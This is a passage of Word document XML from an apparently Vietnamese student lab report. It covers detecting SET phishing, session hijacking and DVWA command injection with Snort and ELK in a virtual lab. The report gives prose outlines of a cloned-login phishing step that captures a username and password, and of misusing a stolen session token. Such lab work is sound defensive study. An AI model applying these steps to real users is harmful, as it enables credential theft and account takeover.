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C1B70">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc26253"/>
      <w:bookmarkStart w:id="1" w:name="_Toc3584"/>
      <w:bookmarkStart w:id="2" w:name="_Toc11198"/>
      <w:bookmarkStart w:id="3" w:name="_Toc6154"/>
      <w:bookmarkStart w:id="4" w:name="_Toc9897"/>
      <w:bookmarkStart w:id="5" w:name="_Toc26107"/>
      <w:bookmarkStart w:id="6" w:name="_Toc7236"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Mô hình thực nghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="2FDF5E8D">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Mô hình gồm 4 phần chính trong cùng một môi trường:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA19823">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Máy tấn công Kali(VM): Máy giả lập attacker dùng để sinh ra traffic mô phỏng cuộc tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0717A5F2">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Máy nạn nhân Windows 10 (VM): máy client mô phỏng người dùng thực tế tạo và nhận traffic với attacker hoặc truy cập trang giả lập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63321191">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Switch: Thiết bị mạng có cấu hình mirror port để sao chép lưu lượng giữa cổng của máy nạn nhân và máy tấn công sang cổng sensor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335A263F">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Máy Snort Kali(VM): Sensor IDS nhận bản sao traffic từ mirror port, phân tích theo rules hoặc signatures sau đó tạo alert/log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6D1898">
      <w:pPr>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Máy ELK Ubuntu (VM): Hệ thống thu nhận logs và hiển thị nhằm mục đích lưu trữ, phân tích và trực quan hóa cảnh báo do Snort phát hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E7E827">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5756910" cy="2903855"/>
            <wp:effectExtent l="0" t="0" r="3810" b="698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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5756910" cy="2903855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>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4FEB614D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc16605"/>
      <w:bookmarkStart w:id="8" w:name="_Toc31123"/>
      <w:bookmarkStart w:id="9" w:name="_Toc7629"/>
      <w:bookmarkStart w:id="10" w:name="_Toc8219"/>
      <w:bookmarkStart w:id="11" w:name="_Toc20210"/>
      <w:bookmarkStart w:id="12" w:name="_Toc30546"/>
      <w:bookmarkStart w:id="13" w:name="_Toc8385"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Các kịch bản thực nghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="2AEE1C7F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc22138"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Phát hiện tấn công Social Engineering Toolkit bằng IDS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="18823C32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left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Mục tiêu: Hệ thống phát hiện nhanh các log phising bằng Snort + ELK, giảm gọn rule để giảm noise sau đó định nghĩa quy trình ứng phó. Từ đó đánh giá khả năng phát hiện của hệ thống IDS khi một chiến dịch social engineering được mô phỏng bằng tài nguyên: email, link giả lập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F7CA4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Kịch bản: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEF42E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720" w:firstLine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 xml:space="preserve">Attacker gửi email nội bộ tới máy nạn nhân chứa link placehodler. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFA5411">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:firstLine="720" w:firstLine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Trên máy nạn nhân mở emial và click link. Máy client sẽ truy cập trang lab tức là network traffic được mirror tới Snort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42543F90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:firstLine="720" w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="16"/>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Snort xử lý HTTP/metadata rồi so khớp rule tạo alert sau đó alert được chuyển sang ELK.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>3.6.2. Phát hiện tấn công TCP hijacking bằng IDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65386538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:firstLine="720" w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="16"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc11113"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Mục tiêu: Phát hiện mạng chỉ điểm khả năng TCP hijacking. Giảm ảnh hưởng tấn công bằng cảnh báo sớm, xác thực incident và cô lập host nghi ngờ. Nâng cấp rules và correlation trong SIEM để giảm false positive và tăng độ tin cậy khi báo động.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:p w14:paraId="7CBFC449">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>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Kịch bản:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204CEDC6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>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Nạn nhân đăng nhập trên trang web không mã hóa HTTP hoặc có token không được bảo vệ. Dòng truyền mạng có arterfact có thể bị thu thập qua bên thứ ba quan sát đường truyền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3186E4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>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Kẻ tấn công khi có token hợp lệ có thể gửi yêu cầu HTTP với token đó để mạo danh nạn nhân và truy cập vào các chức năng thuộc phiên của nạn nhân. Điều này dẫn đến các yêu cầu của HTTP tới server từ địa chỉ khác nhưng mang chung session token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168FA9FB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>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Quan sát những dấu hiệu do tấn công gây ra để phòng thủ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604BBEBD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>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Cùng session token xuất hiện từ nhiều địa chỉ IP khác nhau trong một khoảng thời gian ngắn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F24D57">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>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Cùng session token được dùng từ hai location hay hai User-Agent khác nhau gần về thời gian.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ABC1B1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>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Đột biến hành vi trong phiên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1381C48E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>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Sự xuất hiện của session trong network capture từ traffic HTTP không mã hóa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD4051A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.6.3. Phát hiện tấn công Command Injection trên DVWA bằng Snort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75091D6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>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Mục tiêu: Kiểm tra khả năng phát hiện các payload/artefact liên quan khả năng Command Injection trên ứng dụng DVWA bằng Snort + ELK. Thu thập bằng chứng như: pcap, webserver logs, alerts để phục vụ forensic và tuning rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDC152B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>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Kịch bản:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C41092">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>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DVWA hoạt động bình thường, Snort đã nạp rule phòng thủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4971583E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>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pP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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Google Sans" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="1F1F1F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Mô phỏng request có đặc trưng giống command injection: tester thực hiện request HTTP POST/GET tới endpoint DVWA ứng dụng xử lý input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2EA9C4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc9953"/>
      <w:bookmarkStart w:id="17" w:name="_Toc27960"/>
      <w:bookmarkStart w:id="18" w:name="_Toc572"/>
      <w:bookmarkStart w:id="19" w:name="_Toc10146"/>
      <w:bookmarkStart w:id="20" w:name="_Toc30221"/>
      <w:bookmarkStart w:id="21" w:name="_Toc7225"/>
      <w:bookmarkStart w:id="22" w:name="_Toc7889"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Các bước thực nghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="56868D1F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc7272"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Phát hiện tấn công Social Engineering Toolkit bằng IDS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="69235910">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>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Tiến hành tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182D300A">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2552700"/>
            <wp:effectExtent l="0" t="0" r="11430" b="7620"/>
            <wp:docPr id="1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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="2552700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7960C8">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2333625"/>
            <wp:effectExtent l="0" t="0" r="11430" b="13335"/>
            <wp:docPr id="1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IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="2333625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C5E2A8">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2352675"/>
            <wp:effectExtent l="0" t="0" r="11430" b="9525"/>
            <wp:docPr id="1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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="2352675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32303248">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3000375"/>
            <wp:effectExtent l="0" t="0" r="11430" b="1905"/>
            <wp:docPr id="1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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="3000375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EEC1B5">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p>
    <w:p w14:paraId="29847D7E">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3390900"/>
            <wp:effectExtent l="0" t="0" r="11430" b="7620"/>
            <wp:docPr id="2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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="3390900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9D4CF2">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p>
    <w:p w14:paraId="5383C173">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Trên máy nạn nhân sau khi hacker gửi link github.com/login qua mail nạn nhân mở trình duyệt và nhân thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5FFCD4">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2390775"/>
            <wp:effectExtent l="0" t="0" r="11430" b="1905"/>
            <wp:docPr id="21"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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="2390775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="544C6C4F">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3419475"/>
            <wp:effectExtent l="0" t="0" r="11430" b="9525"/>
            <wp:docPr id="22"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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="3419475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACB98A9">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t>Trên máy tấn công đã có được username passworpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36488018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="2085975"/>
            <wp:effectExtent l="0" t="0" r="11430" b="1905"/>
            <wp:docPr id="23"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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="2085975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C751006">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc19883"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Phát hiện tấn công TCP hijacking bằng IDS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="1F24AC70">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
